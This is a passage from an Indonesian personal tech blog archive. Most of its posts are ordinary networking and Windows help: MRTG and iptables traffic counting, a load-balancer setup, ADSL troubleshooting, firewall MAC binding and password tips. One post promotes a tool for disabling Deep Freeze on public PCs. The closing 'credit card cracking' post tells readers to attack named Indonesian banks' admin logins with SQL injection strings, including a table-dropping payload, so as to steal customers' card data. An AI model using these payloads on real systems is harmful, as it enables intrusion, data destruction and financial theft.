Bila apache telah berjalan, cobalah untuk membuka http://10.11.12.1/mrtg/ untuk melihat hasilnya.
4. Pengembangan

Dengan cara pengukuran yang persis sama anda dapat pula mengukur besarnya keluar masuk paket per layanan misal web, ftp, smb, domain, dan sebagainya. Pengukuran dilakukan dengan menggunakan iptables, hanya saja kita tidak mendefinisikan alamat IP per komputer. Yang kita definisikan adalah protokol(TCP/UDP/ICMP) beserta nomor portnya, serta network address jaringan kita seperti contoh di bawah ini.

root:~# iptables -N www-in
root:~# iptables -N www-out
root:~# iptables -A FORWARD -d 10.11.12.0/24 -p tcp --dport 80 -j www-in
root:~# iptables -A FORWARD -s 10.11.12.0/24 -p tcp --sport 80 -j ww-out

root:~# iptables -N ftp-in
root:~# iptables -N ftp-out
root:~# iptables -A FORWARD -d 10.11.12.0/24 -p tcp --dport 20:21 -j ftp-in
root:~# iptables -A FORWARD -s 10.11.12.0/24 -p tcp --sport 20:21 -j ftp-out

Contoh rule iptables di atas berguna untuk menghitung:

1. Besar paket data yang kita dapatkan dari webserver yang berasal dari luar jaringan kita.
2. Besar paket data request ke webserver di luar jaringan kita.
3. Besar paket data yang kita download melalui ftp yang berasal dari luar jaringan kita.
4. Besar paket data upload melalui ftp ke luar jaringan kita.

Edit mrtg.cfg untuk memasukkan hasil perhitungan iptables untuk kedua port yang baru.

Target[www]: `/usr/local/sbin/scriptbacatrafik.sh www`
Title[www]: www
PageTop[www]:

www

MaxBytes[www]: 1250000
YLegend[www]: Bytes/s
ShortLegend[www]: B/s
LegendI[www]: Traffic in
LegendO[www]: Traffic out
Legend1[www]: Traffic in Bytes per Second

Target[ftp]: `/usr/local/sbin/scriptbacatrafik.sh ftp`
Title[ftp]: ftp
PageTop[ftp]:

ftp

MaxBytes[ftp]: 1250000
YLegend[ftp]: Bytes/s
ShortLegend[ftp]: B/s
LegendI[ftp]: Traffic in
LegendO[ftp]: Traffic out
Legend1[ftp]: Traffic in Bytes per Second

Selamat mencoba, semoga sukses.

Membuat Cluster Load Balancing Dengan Cepat dan Mudah ...gman yah..???

2008-10-20T20:35:00.000-07:00

Selama ini orang selalu menganggap bahwa membuat cluster load balancing adalah hal yang rumit dan memusingkan. Dan.. memang benar pendapat ini. Tapi sebenarnya ada satu cara mudah untuk mencapainya dengan menggunakan yang namanya balance.

Sebelumnya kita bahas dahulu sedikit mengenai konsep Clustering. Secara prinsip clustering mempunyai 2 buah pendekatan:
1. High Availability (Failover), adalah bila satu server gagal melayani service tertentu, maka tugas server tersebut otomatis akan dilempar ke server lainnya.
2. High throughput (Performance), disini yang diinginkan adalah performance yang tinggi yang dicapai dengan "membagi2" tugas yang ada ke sekumpulan server. Contohnya adalah:
2a. High-performance Computing (HPC), adalah sekumpulan server yang bekerja bersama-sama pada saat yang bersamaan untuk mengerjakan sesuatu tugas tertentu, biasanya dalam bentuk tugas perhitungan yang berat2, seperti simulasi bumi, me-render film animasi, dll.
2b. Load Balancing, adalah membagi2 beban kerja ke sekumpulan server diluar konteks computing, misalnya membagi beban kerja web server, mail server, dll.

Bagaimana mencapai hal ini?
Ada beberapa software opensource yang dapat kita gunakan:
1. Linux High-Availability (http://www.linux-ha.org)
2. RedHat Cluster Suite dan Piranha (http://www.redhat.com)
3. Linux Virtual Server (http://www.linuxvirtualserver.org)
4. BeoWulf Cluster (http://www.beowulf.org)
5. Openmosix (http://openmosix.sourceforge.net)

Namun solusi2 di atas kadang kala terlalu "canggih" atau "overkill" untuk mencapai tujuan clustering kita. Disinilah 'balance' masuk. Apa yang dapat ia sediakan?
1. Merupakan user-space program. Tidak perlu compile kernel dll. Langsung jalan secara command line.
2. Load balancing secara tcp. Cukup menyebutkan protocol atau port tcp berapa yang ingin kita load balancing.

Cara setup:
1. Download paketnya dari http://www.inlab.de/balance.html
wget http://www.inlab.de/balance-3.40.tar.gz
2. Extract, compile dan install:
2a. tar zxvf balance-3.40.tar.gz
2b. cd balance-3.40
2c. vi Makefile
Ubah baris ini: MANDIR=${BINDIR}/../man/man1
Menjadi: Untuk Ubuntu: MANDIR=/usr/share/man/man1
Untuk RedHat: MANDIR=/usr/local/share/man/man1
2d. make
2e. make install
Done! :)

Cara pakai:
Sebelumnya kita misalkan skenario seperti ini:
Kita mempunyai sebuah website yang ingin kita bagi beban kerjanya ke 3 buah server web. Maka kita perlu mensetupnya seperti terlihat di gambar (Oya, gambarnya adalah foto PC zaman dulu, tapi itu hanya ilustrasi yah, nanti servernya jangan pakai PC zaman dulu juga. Hehe...). Tiga buah server web yaitu www1 (192.168.0.1), www2 (192.168.0.2), dan www3 (192.168.0.3). Di depan mereka kita install sebuah server (192.168.0.254) yang bertugas membagi2 bebas kerja para server www tersebut. Jadi IP yang akan diakses oleh user adalah IP 192.168.0.254, jangan ke masing2 server www.

Commandnya: (Jalankan command ini di 192.168.0.254) balance
Bila diketik tanpa option dia akan muncul seperti ini:
_ _
| |__ __ _| | __ _ _ __ ___ ___
| '_ \ / _` | |/ _` | '_ \ / __/ _ \
| |_) | (_| | | (_| | | | | (_| __/
|_.__/ \__,_|_|\__,_|_| |_|\___\___|
this is balance 3.40
Copyright (c) 2000-2006,2007
by Inlab Software GmbH, Gruenwald, Germany.
All rights reserved.

usage:
balance [-b addr] [-B addr] [-t sec] [-T sec] [-adfpHM] \
port [h1[:p1[:maxc1]] [!%] [ ... hN[:pN[:maxcN]]]]
balance [-b addr] -i [-d] port
balance [-b addr] -c cmd [-d] port

-a enable channel autodisable option
-b host bind to specific address on listen
-B host bind to specific address for outgoing connections
-c cmd execute specified interactive command
-d debugging on
-f stay in foregound
-i interactive control
-H failover even if Hash Type is used
-M use MMAP instead of SHM for IPC
-p packetdump
-t sec specify connect timeout in seconds (default=5)
-T sec timeout (seconds) for select (0 => never) (default=0)
! separates channelgroups (declaring previous to be Round Robin)
% as !, but declaring previous group to be a Hash Type

examples:
balance smtp mailhost1:smtp mailhost2:25 mailhost3
balance -i smtp
balance -b 2001:DB8::1 80 10.1.1.1 10.1.1.2
balance -b 2001:DB8::1 80

Jadi cara pakainya adalah misalnya:
balance -f http 192.168.0.1 192.168.0.2 192.168.0.3

Option -f itu artinya balance jalan di foreground, berguna untuk kita debug dan cancel. Kalau misalnya sudah ok, bisa kita jalankan tanpa option -f, maka balance akan jalan di background.

Untuk melihat cara bekerja balance adalah dengan membuka sebuah terminal dan meload website 192.168.0.254 secara berulang2. Untuk mudahnya dapat kita gunakan text browser seperti elinks:
watch elinks --dump http://192.168.0.254
Untuk kebutuhan testing, dapat kita atur agar isi website di 192.168.0.1, 192.168.0.2, dan 192.168.0.3 berbeda, jadi command di atas akan menampilkan isi website yang berbeda, tanda bahwa balance sudah meload balancing traffik web ke tiga buah server tersebut.

Contoh lain adalah:
balance -f http 192.168.0.1::100 ! 192.168.0.2::100 ! 192.168.0.3
Arti option di atas adalah: koneksi http akan diprioritaskan ke server 192.168.0.1 sampai sebanyak 100 koneksi, bila sudah penuh maka akan dilempar ke 192.168.0.2 sampai sebanyak 100 koneksi juga, sisanya akan ke 192.168.0.3

Bagaimana jika kita ingin menghandle koneksi yang memerlukan session seperti website dynamic pakai php? Hal ini bisa dicapai dengan option '%' yaitu mengaktifkan session seperti ini:
balance -f http 192.168.0.1 192.168.0.2 192.168.0.3 %

Untuk option2 selengkapnya dapat kita lihat di 'man balance'.

Apakah hanya dapat digunakan untuk akses http? Tentu tidak, dengan sedikit eksplorasi kita dapat pula menggunakannya untuk keperluan lain seperti load balancing akses internet, email, proxy, dll.

Penutup
Program balance ini menyediakan sebuah solusi praktis dan mudah untuk membuat sebuah cluster load balancer. Performance yang dihasilkan cukup bagus. Namun bila kita ingin menggunakan solusi yang lebih handal, kita dapat menggunakan LVS (linux virtual server) dengan kombinasi linux-ha. Namun tentu saja settingannya akan jauh lebih rumit. Kita akan membahasnya di lain kesempatan. Selamat mencoba :)

Wellcome Ramadhan...!!

2008-08-31T22:43:00.000-07:00

Gr3g3t4n.blogspot.com...!!Met menjalankan Ibadah Puasa bagi yang menjalaninya,dan hormatilah orang yang berpuasa!!.Semoga puasa kita semua bisa diterima oleh Allah SWT..!!Amin..!!

2008-08-25T01:04:00.000-07:00

Buat yang berlangganan Speedy, Ada tips utk menghandle sendiri gangguan yang sering terjadi pada koneksi internet Speedy. Dari pengalaman kebanyakan gangguan akses Speedy itu berasal dari sisi CPE (Costumer Premises Equiptment) atau disebut juga kelengkapan di sisi user seperti modem dan splitter hingga kesalahan sepele seperti salah username dan password.

Lihat IP modem: Klik Start – Run – ketik cmd (pada Windows XP/Vista), command ( pada Windows 98/2000) lalu muncul halaman command dan ketik ipconfig/all dan enter. Lihat IP Gateway (modem). Misal IP Gateway adalah 192.168.1.1. Gambar berikut menunjukkan display ipconfig/all.

Cek koneksi PC ke modem ADSL: Klik Start – Run, ketik ping 192.168.1.1 -t sehingga muncul tampilan seperti gambar berikut.

Kemudian Cek koneksi PC ke DNS Telkom: Klik Start – Run, ketik ping 202.134.0.155 -t, sehingga muncul tampilan berikut.

Jika Koneksi gagal setelah login speedy dan pesan command tidak sama dengan di atas misal “request time out” atau “destination host unreachable” seperti yang ditunjukkan pada gambar.

Maka lakukan troubleshooting sebagai berikut:

1. Pastikan saluran telepon baik dengan mengangkat pesawat telpon dan mendapat nada dial.

2. Pastikan kabel Ethernet Modem – PC dan kabel modem - telepon terhubung dengan baik. Tidak ada PABX, paralel telepon atau peralatan lain yang terhubung sebelum splitter.

3. Matikan modem dan tunggu sekitar 1 menit, nyalakan kembali dan pastikan lampu ADSL menyala tanpa blinking.

4. Pastikan username dan password sudah benar

Username : No.speedy@telkom.net
Password : xxxxx

5. Jika LAN disable. Klik Start – Settings – Control Panel – Network connection – Local Area Connection, Double klik Local Area Connection untuk men-enablekan LAN.

6. ADSL tidak blinking tetapi koneksi PC ke DNS “request time out”. Matikan fitur firewall (lihat user manual modem) di sisi modem, lakukan restart modem ADSL.

7. Pesan DNS masih “request time out” atau tidak mendapat IP. Lakukan setting IP:

a.Pada windows XP

Klik Start – Settings – Control Panel – Network connection – Local Area Connection – TCP/IP. Isi kolom TCP/IP berikut:

IP address : 192.168.1.x (x dapat diisi angka 2 sampai 253)
Subnet mask : 255.255.255.0
Gateway : 192.168.1.1 (Harus sama dengan IP address modem)
Preferred DNS : 192.168.1.1 dan Alternate DNS : 202.134.0.155

b.Pada Windows 98/ME/2000

Klik Start – Settings – Control Panel – Network – Configuration tab – TCP/IP Properties. Isi kolom TCP/IP sebagai berikut:

IP address : 192.168.1.x (x dapat diisi angka 2 sampai 253)
Subnet mask : 255.255.255.0
Preferred DNS : 192.168.1.1dan Alternate DNS : 202.134.0.155

8. Jika modem hang. Refresh dan Setting ulang modem via menu modem (lihat user manual modem, Note: VPI=8, VCI=81 )

9. Hubungi 147 untuk informasi lebih lanjut.

Nah untuk anda yang berlangganan Speedy berbasis ADSL ini, kalo ada gangguan coba deh ikutin cara-cara ini dan jangan cepat-cepat untuk telp ke 147.

Pada saat shutdown Windows tidak juga menampilkan tulisan "It's now safe to turn off your computer"

2008-08-25T01:01:00.002-07:00

Saat shutdown windows 95/98 tidak menampilkan "shutdown screen"

Saat shutdown, windows 95/98 tidak menampilkan "shutdown screen" yang berupa tulisan It's now safe to turn off your computer.

Penyebab & Solusinya :

1. Komputer tidak dapat men-shutdown suatu program.
Sebelum komputer melakukan shutdown maka terlebih dahulu dia akan menutup program-program yang masih berjalan. Program-program tersebut bisa berupa antivirus, utility, atau yang lainnya. Nah, bila komputer Anda tidak bisa melakukan shutdown secara sempurna hal ini bisa terjadi karena komputer tersebut tidak dapat men-shutdown suatu program. Sebagai contoh pada program NetMedic. Pada saat kita menjalankan program NetMedic maka program tersebut juga akan menjalankan syshook.exe sebagai virtual device driver. Tetapi pada saat kita keluar dari NetMedic file syshook.exe tersebut masih "tertinggal" di memori. Nah, file-file seperti syshook.exe inilah yang antara lain menyebabkan terjadinya masalah. Salah satu cara untuk "mematikan" syshook.exe adalah dengan menampilkan Task Manager yaitu dengan menekan tombol [Ctrl] [Alt] [Del]. Pilih file syshook.exe dan tekan End Task.
Bila Anda mengalami masalah seperti di atas, cara gampangnya adalah dengan menutup semua program (yang terdapat pada Task Manager) kecuali :

Explorer
Rnnapp Osa
(jika Anda menginstall MS Office)
light (jika Anda memakai modem)
systray

Setelah semua program telah ditutup Anda bisa melakukan Shutdown (atau Restart).

2. Windows 98 SE memang mempunyai masalah pada beberapa hardware tertentu. Tetapi Microsft telah mengeluarkan patch untuk masalah tersebut dan bisa Anda dapatkan di situs Microsoft

Kerusakan pada file win.com

2008-08-25T01:01:00.001-07:00

Kerusakan pada file win.com

Saat booting windows 95/98 komputer Anda menampilkan pesan:

* The following file is missing or corrupted: Win.com
* The following file is missing or corrupted: Win.com
* Program too big to fit in memory Cannot find Win.com, unable to continue loading Windows
* Program too large

Penyebab :

Hal ini bisa terjadi bila file win.com mengalami kerusakan. Ukuran untuk file win.com yang tepat adalah sebagai berikut :

Windows 95: 22,679 bytes
Windows 95 OSR 2 24,503 bytes
Windows 98: 24,791 bytes

Solusi :

Untuk mengatasinya, Anda harus membuat file win.com baru dengan cara mengekstrak file win.cnf dari CD Windows. Langkah komplitnya sebagai berikut :

1. Ekstrak file win.cnf dari CD Windows ke folder C:\Windows. Adapun letak file win.cnf adalah : Pada Windows 95 terletak pada file Win95_03.cab Pada Windows 98 terletak pada file Win98_28.cab
2. Setelah diekstrak kemudian gantilah nama win.cnf menjadi win.com. Caranya : ren c:\windows\win.cnf c:\windows\win.com
3. Terakhir restartlah komputer Anda

Pada saat booting komputer menampilkan pesan : Cannot Find a Device File...Vnetsup.vxd

2008-08-25T00:59:00.000-07:00

Cannot Find a Device File...Vnetsup.vxd

Saat booting windows 95 komputer Anda menampilkan pesan:

Cannot find a device file that may be needed to run Windows or a Windows application.
The Windows registry or System.ini file refers to this device file, but the device file no longer exists. If you deleted this file on purpose, try uninstalling the associated application using its uninstall program or setup program. If you still want to use the application associated with this device file, try reinstalling that application to replace the missing file.
Vnetsup.vxd -atau- Dfs.vxd

Penyebab :
Kesalahan tersebut dapat terjadi bila Anda menghapus komponen Microsoft Network (pada properties Network).

Solusi :

* Untuk mengatasinya, ikuti langkah-langkah berikut :
Buka registry (caranya klik tombol Start, pilih Run. Ketikkan regedit lalu klik OK). Hapuslah nilai StaticVxD pada subkey Vnetsup pada : HKEY_LOCAL_MACHINE\System\CurrentControlset\
Services\VxD\vnetsup

atau

hapuslah nilai StaticVxD pada subkey DFS pada : HKEY_LOCAL_MACHINE\System\CurrentControlset\
Services\VxD\dfs

* Install dan hapus komponen Microsoft Network

Caranya : dari Control Panel klik dua kali pada Network. Klik Add - Adapter - Add lagi. Pada kotak Manufacturers, klik Detected Network Driver. Pada kotak Network Adapters, klik Existing NDIS2 Driver, dan terakhir klik OK. Setelah itu tutup Network. Bila Windows meminta restart, restartlah. Setelah itu masuk lagi ke Control Panel, klik dua kali pada Network. Klik network adapter lalu klik Remove. Terakhir klik OK. Biasanya komputer akan meminta Restart. Ikuti saja....

Pada saat booting komputer Anda langsung menampilkan layar "It's now safe to turn off your computer".

2008-08-25T00:58:00.000-07:00

Saat booting Windows langsung menampilkan "shutdown screen"

Saat booting windows 95/98 komputer Anda langsung menampilkan tulisan : It's now safe to turn off your komputer"

Penyebab :
Hal ini karena file Vmm32.vxd atau wininit.exe mengalami kerusakan.

1. Solusi
Anda harus meng-copy file wininit.exe dari cd Windows 95/98. Pada Windows 95 file wininit.exe terletak pada win95_11.cab. Untuk melakukan extract Anda dapat perlu masuk ke MS DOS Prompt lalu ketikkan extract . Bila Anda belum tahu perintah-perintah extract ketikkan extract /? lalu tekan enter.
2. Setelah itu restart komputer Anda.

Membuat file vmm32.exe baru

1. Restart komputer Anda. Untuk Windows 95, saat muncul tulisan "Starting Windows 95", tekan tombol F8, dan pilih Command Prompt Only. Untuk Windows 98, tekan terus tombol CTRL setelah komputer ANda melakukan Power On Self Test (POST), kemudian pilih Command Prompt Only.
2. Setelah itu pidah ke folder Windows\System dengan cara mengetikkan :
cd \windows\system
3. Ketikkan :
ren vmm32.vxd vmm32.old
4. Terakhir install lagi Windows 95/98

Pada saat booting windows menampilkan berbagai pesan kesalahan

2008-08-25T00:54:00.001-07:00

Mengatasi masalah pada booting Windows

Banyak masalah yang terjadi pada waktu booting. Untuk mengatasinya Anda perlu tahu apakah masalah itu terjadi sebelum komputer menampilkan Windows splash screen. Bila ya kemungkinan besar terjadi masalah pada hardware atau BIOS.

Bila windows tidak menampilkan desktop screen

Mungkin Anda pernah mengalami masalah seperti ini. Kompoter Anda sudah menampilkan splash screen tapi ditunggu sampai lama windows tidak juga menampilkan desktop screen. Untuk mengatasinya Anda perlu booting pada Safe Mode. Caranya, pada saat komputer selesai melakukan "proses" BIOS tekanlah tombol [Ctrl] sampai muncul berbagai menu pilihan. Setelah itu pilihlah Safe Mode. Jika Anda termasuk beruntung maka Anda bisa masuk windows sampai desktop screen. Klik kanan pada My Computer, pilih Properties. Pillih pada tab Device Manager. Bila Anda melihat tanda seru pada salah satu Device yang ada berarti terjadi "konfilk" device. Untuk itu Anda perlu men-disable hardware yang mengalami masalah. Setelah itu Anda bisa restart.

Proteksi IP Dari Client Yang Suka Ganti - Ganti IP

2008-08-25T00:48:00.000-07:00

Kadang kita sebagai administrator suatu jaringan sangat dipusingkan dengan beberapa client “nakal” yang suka berganti-ganti IP Address. Padahal sebelumnya suatu IP Address tertentu dari client sudah kita blok aksesnya untuk jam-jam tertentu, atau kita blok untuk mengakses suatu situs tertentu.
Mungkin sedikit yang bisa saya berikan disini adalah, bagaimana kita dapat mengatasi “kenakalan” client-client tersebut agar tidak bisa mengganti IP Address mereka secara “enaknya saja”. Saya harapkan Anda paling tidak sudah tahu apa itu IP Address dan apa itu MAC Address. Dalam melakukan percobaan disini saya menggunakan Linux distro ClarkConnect Home Edition versi 3.0 yang dilengkapi dengan iptables versi 1.2.11. Rekan-rekan dapat menggunakan distro Linux lainnya.

Keuntungan dan kerugian :

* Keuntungan yang didapatkan adalah, kita dapat dengan mudah memonitor “pergerakan” client dan melakukan logging untuk administrasi jaringan atau analisa-analisa lain yang diperlukan, karena client tidak dapat melakukan perubahan IP Address.
* Kerugian, seandainya saja interface hardware milik client mengalami kerusakan dan melakukan pergantian, kita harus melakukan konfigurasi ulang rules firewall kita berdasarkan MAC Address yang baru. Tapi kerusakan ini sangat jarang terjadi.
Ada 2 metode yang saya gunakan disini dan dapat rekan-rekan sekalian pilih salah satunya, yaitu :

* Pertama, apakah kita akan melakukan pendaftaran semua IP Address dan MAC Address client-client kita dan tidak memperkenankan semua client yang terhubung dengan kita tidak dapat berganti-ganti IP Address. Jika IP dan MAC Address tidak terdaftar didalam rules firewall, maka client tidak dapat melakukan koneksi.
* Kedua, apakah kita hanya menginginkan IP Address dan MAC Address tertentu saja yang tidak kita inginkan untuk berganti-ganti IP Address. Disini, jika ada IP baru dan dengan MAC Address baru, client tetap dapat melakukan koneksi.

Kasus, disini kita mempunya 3 client, yaitu :
IP Client 1 = 192.168.1.5
MAC Address 1 = 00:89:CD:64:01:EF

IP Client 2 = 192.168.1.20
MAC Address 1 = 00:90:DD:14:11:CF

IP Client 3 = 192.168.1.14
MAC Address 3 = 00:40:EE:21:26:GE

Semua client terkoneksi melalui ethernet (LAN Card/NIC) 1 yang diberi nama eth1.

Firewalling dengan metode pertama :

#drop semua prerouting di eth1
iptables -I PREROUTING -t nat -i eth1 -j DROP

#——————- client pertama————————
#accept IP 192.168.1.5 dengan mac address 00:89:CD:64:01:EF

iptables -I PREROUTING -t nat -i eth1 -s 192.168.1.5 -m mac –mac-source 00:89:CD:64:01:EF -j ACCEPT

#drop IP 192.168.1.5 dengan mac address 00:89:CD:64:01:EF
#jika menggantinya dengan IP lain selain dari 192.168.1.5

iptables -I FORWARD -i eth1 -s ! 192.168.1.5 -m mac –mac-source 00:89:CD:64:01:EF -j DROP

#drop prerouting IP 192.168.1.5 dengan mac address 00:89:CD:64:01:EF
#jika menggantinya dengan IP lain selain dari 192.168.1.5

iptables -I PREROUTING -t nat -s ! 192.168.1.5 -m mac –mac-source 00:89:CD:64:01:EF -j DROP

#——————- client kedua————————
#accept IP 192.168.1.20 dengan mac address 00:90:DD:14:11:CF

iptables -I PREROUTING -t nat -i eth1 -s 192.168.1.20 -m mac –mac-source 00:90:DD:14:11:CF -j ACCEPT

#drop IP 192.168.1.20 dengan mac address 00:90:DD:14:11:CF
#jika menggantinya dengan IP lain selain dari 192.168.1.20

iptables -I FORWARD -i eth1 -s ! 192.168.1.20 -m mac –mac-source 00:90:DD:14:11:CF -j DROP

#drop prerouting IP 192.168.1.20 dengan mac address 00:90:DD:14:11:CF
#jika menggantinya dengan IP lain selain dari 192.168.1.20

iptables -I PREROUTING -t nat -s ! 192.168.1.20 -m mac –mac-source 00:90:DD:14:11:CF -j DROP

Catatan :
Disini karena client 3 tidak masuk kedalam rules, maka tidak dapat melakukan koneksi, walaupun berganti IP Address yang sama dengan client 1 dan 2. Sedangkan client 1 dan 2 tetap dapat melakukan koneksi, selama tidak melakukan perubahan IP Address.

Firewalling dengan metode kedua :

#——————- client pertama————————
#drop IP 192.168.1.5 dengan mac address 00:89:CD:64:01:EF
#jika menggantinya dengan IP lain selain dari 192.168.1.5

iptables -I FORWARD -i eth1 -s ! 192.168.1.5 -m mac –mac-source 00:89:CD:64:01:EF -j DROP

#drop prerouting IP 192.168.1.5 dengan mac address 00:89:CD:64:01:EF
#jika menggantinya dengan IP lain selain dari 192.168.1.5

iptables -I PREROUTING -t nat -s ! 192.168.1.5 -m mac –mac-source 00:89:CD:64:01:EF -j DROP

#——————- client kedua————————
#drop IP 192.168.1.20 dengan mac address 00:90:DD:14:11:CF
#jika menggantinya dengan IP lain selain dari 192.168.1.20

iptables -I FORWARD -i eth1 -s ! 192.168.1.20 -m mac –mac-source 00:90:DD:14:11:CF -j DROP

#drop prerouting IP 192.168.1.20 dengan mac address 00:90:DD:14:11:CF
#jika menggantinya dengan IP lain selain dari 192.168.1.20

iptables -I PREROUTING -t nat -s ! 192.168.1.20 -m mac –mac-source 00:90:DD:14:11:CF -j DROP

Catatan :
Disini walaupun client 3 tidak masuk kedalam rules, tetap dapat melakukan koneksi, walaupun berganti IP Address asal tidak sama IP Addressnya dengan client 1 dan 2. Client 1 dan 2 tetap dapat melakukan koneksi, selama tidak melakukan perubahan IP Address.

Sampai disini rekan-rekan sekalian dapat mengembangkannya, mungkin dengan membatasi besar bandwith IP Address tertentu milik client, atau hanya dapat melakukan browsing namun tidak dapat melakukan chatting dalam waktu-waktu tertentu.

Mohon maaf..

2008-07-27T03:09:00.000-07:00

Saya meminta maaf kepada semua yang melihat blog saya karena masih banyak kekurangan dan perlu adanya perbaikan.Dan sekarang blog ini juga masih dalam masa perbaikan menuju yang lebuh baik..!!.Dan semua postingan yang ditampilkan semata mata hanya untuk pembelajaran bukan untuk hal yang lain..!!.Terima kasih..!!
Gr3g3t4n....!!

Protec solutions

2008-07-27T02:58:00.000-07:00

Cara hacker menebak password kita antara lain dengan:

1. Brute force attack, yaitu dengan mencoba semua kombinasi, mulai dari aaaa sampai zzzz, sampai beberapa karakter.
2. Dictionary attack, yaitu dengan menebak menggunakan kata-kata dalam kamus, dan dikombinasikan dengan angka-angka atau karakter.
3. Personal information attack, dengan cara memasukkan data-data pribadi seperti nomor telepon, tanggal lahir, nama pacar, kode pos, dan sebagainya.

Password yang sangat lemah akan sangat mudah dibobol hacker dengan cara ini. Contoh password yang sangat lemah misalnya:

* 123456, qwerty, asdf, ini karena mudah sekali orang mengetik kombinasi ini di keyboard.
* password, mypassword, dan lain-lain yang menggunakan kata-kata dalam kamus (semua bahasa).
* tanggal lahir, nama pacar, dan lainnya yang merupakan data diri orang tersebut.

Password yang lemah, bisa dibobol dalam waktu yang lebih cepat, misalnya:

* menggunakan semua huruf kecil.
* menggunakan kombinasi kata dan angka, misalnya buku10, teroris80.
* mengganti huruf dengan karakter, misalnya c1nt@

Bagaimana password yang kuat dan sulit ditembus hacker?

1. Merupakan kombinasi dari huruf besar, huruf kecil, nomor, dan karakter.
2. Panjang lebih dari 10 karakter.
3. Tidak menyertakan kata-kata dalam kamus.

Password yang kuat harus mudah diingat oleh pemiliknya.

Contoh password yang kuat: 1mAu$100Ribu

Cara mengingatnya:

* 1 = kata “saya” diterjemahkan dalam bahasa Inggris (I).
* mAu = mau
* $ = uang
* 100Ribu = 100 ribu

Contoh password kuat yang lain: ninG->0+1Gul

Cara mengingatnya:

* ninG = misalnya nama orang sepesial buat Anda: Naning
* -> = panah identik dengan adalah
* 0+ = lambang cewek
* 1 =berarti nomor satu atau paling
* Gul = gula itu manis

Beberapa tips:

1. Jangan menggunakan password yang sama untuk berbagai macam layanan, misalnya password email Anda sama dengan password friendster. Ini berarti:
* seseorang yang dapat menjebol password friendster Anda, bisa juga menjebol password email Anda. Sementara di mata hacker menjebol password friendster lebih mudah daripada menjebol email Yahoo.
* admin atau “orang dalam” friendster tahu password Anda, dia juga bisa memasukkan password tersebut ke email Anda.
2. Jangan mengklik link di email yang menyatakan Anda harus memverifikasi password Anda. Email ini dikirim oleh hacker.
3. Jangan memasukkan password disitus selain yang memberikan layanan. Misalnya jangan memasukkan password yahoo di situs friendster untuk alasan apapun (misalnya import address book).
4. Sebelum login ke email atau yang lain, pastikan URL di browser Anda benar. Misalnya mail.yahoo.com bukan mail.yahoo-ltd.com atau yahoo-verify.com atau yang lain.
5. Untuk rekening online seperti e-gold, klik BCA, paypal, sebaiknya Anda tidak mengetik password Anda lewat keyboard (karena hacker bisa membaca keyboard Anda dengan program keylogger). Gunakan On Screen Keyboard, Charakter Map, atau copy paste dari huruf acak.

Okey begitulah tips-tips agar password kita sulit dibobol hacker. Semoga dengan tips ini account kita aman dan terhindar dari kebobolan.

Jebol...lagi.....!!

2008-07-01T02:22:00.001-07:00

Menjebol Deep Freeze 5
Tempat Publik seperti warnet biasanya diproteksi oleh program automatic-recovery seperti Deep Freeze. Hal ini tentunya sangat membantu bagi Administrator Warnet, karena tidak perlu pusing memikirkan soal Virus,Trojan,KeyLog,Spyware dan sebagainya. Setiap kali PC di restart maka semua data akan hilang dan kembali ke settingan awal.
Namun tampaknya Deep Freeze tidak luput dari serangan para Hacker. Terutama Deep Freeze versi 5 dan dibawahnya. Di Internet sudah banyak tersebar Tools bernama UnDeep Freeze yang dapat menon-aktifkan Deep Freeze meskipun kita tidak mengetahui passwordnya. Saat artikel ini ditulis memang sudah sangat basi kedengerannya tapi believe or not ternyata masih banyak Warnet yang tidak menyadari kelemahan dari Deep Freeze 5 dan kebawah.
Akhirnya para iseng mania (kalo tidak layak disebut Hacker) seperti saya , dan juga banyak orang lain diluar sana, dapat dengan mudah melumpuhkan Deep Freeze, dan bahkan menyebarkan virus buatan sendiri (ingat membuat Virus kian mudahnya).
Untuk itu bagi para penyedia layanan publik seperti warnet atau Laboratorium kampus, harap lebih aware terhadap hal yang seperti ini.Bila anda tidak percaya, anda dapat langsung mendownload Tools UnDeep Freeze 1.6 .
Bahkan untuk Deep Freeze 6 sudah ada yang berhasil menjebolnya juga, meski dengan cara yang sedikit lebih repot. Pada posting selanjutnya akan saya bahas.
Keep Secure !

credit card cracking......!! becanda.....koq..!!

2008-07-01T02:17:00.000-07:00

Credit cart cracking….he….
hm...!!Sebelum nya maaf kan penulis kalau judul nya cenderung untuk berniat jahat.tapi jangan salah...!!justru setelah membaca tulisan yang singkat ini mampu membuat para perusahaan memiliki security yang benar-benar bisa di andalkan nach...!!kita mulai untuk mengetahui aksi-aksi para carder.sebenar nya tak perlu mempunyai banyak ilmu mengenai IT(Internet Technology)cukup sering browsing/surfing.berikut akan saya ulas sedikit aksi dari para carder.
SQL(Simple Query Laguage)tau gak apa SQL ini?kalo lom tau nach...cari tau dulu dech.
untuk mencari perusahaan yang ingin kita kuras database/isi-isi dan termasuk kartu kredit para pelanggan nya.Caranya:gunakan search engine.yang saat ini paling populer yaitu GOOGLE.ketikan nama perusahaan yang akan di tuju.contoh nya:http//:www.bankbri.co.id.maka tambahkan di akhirnya kata-kata ADMIN/ASP Aatau PHP.
EH TAU GAK??HTTP-WWW-PHP-ASP???DUH..GIMANA MO JADI HACKER KALO KEPANJANGAN ITU AJA GAK TAU.ININIH KEPANJANGAN NYA.ARTINYA CARI SENDIRI...
HTTP=HYPER TEXT TRANSPER PROTOCOL
WWW=WORD WIDE WEB
PHP=HYPER TEXT PREPROCESSOR
ASP=ACTIVE SERVER PAGE
Naah...!!kalo udah tau kepanjangan nya.khan enak...!! kita lanjut pembahasan kita kali ini.tadi kan dah di contoh kan bankmandiri.co.id yang akan di kuras.ketikkan di ujung nya tambahan admin.asp ato php.maka secara otomatis akan dipinta username dan password nya.
naah..tugas kita adalah mencari username dan pasword nya.gimana caranya bang??kita pura-pura tau aja dengan memasukkan dibagian username+password.eeh sebelum nya.tau gak???kalo pesan error itu memberi arahan untuk mencari username nya.nah...gini cara-caranya.ada lima caranya ketikkan dibagian username:
1. '; drop table user--(-;=dinamakan: single line comment,gunanya apa?gunanya agar tidak terjadi error pada saat dijalankan
2. pada bagian username: admin'--
3. ------------^^------------------: 'or 1=1-
4. ------------^^------------------: 'union select 1, 'fictional_user' . 'some_password' . 1--
5. atau dengan sengaja mengisi bidang username salah untuk mendapat kan pesan error yang ditampilkan(error message)gunanya melacak dari pesan tadi.jangan salah lho.....pesan error ternyata ada fungsinya. ketikkan saja: 'having 1=1- -
maka pesan yang akan muncul sebagai berikut:
[Microsoft ODBC SQL SERVER DRIVE] [SQL SERVER] colomn 'USER.id is invalid in the select list because it not contained in an aggregate function and there is no group by clause/ proces_login.asp,line 35
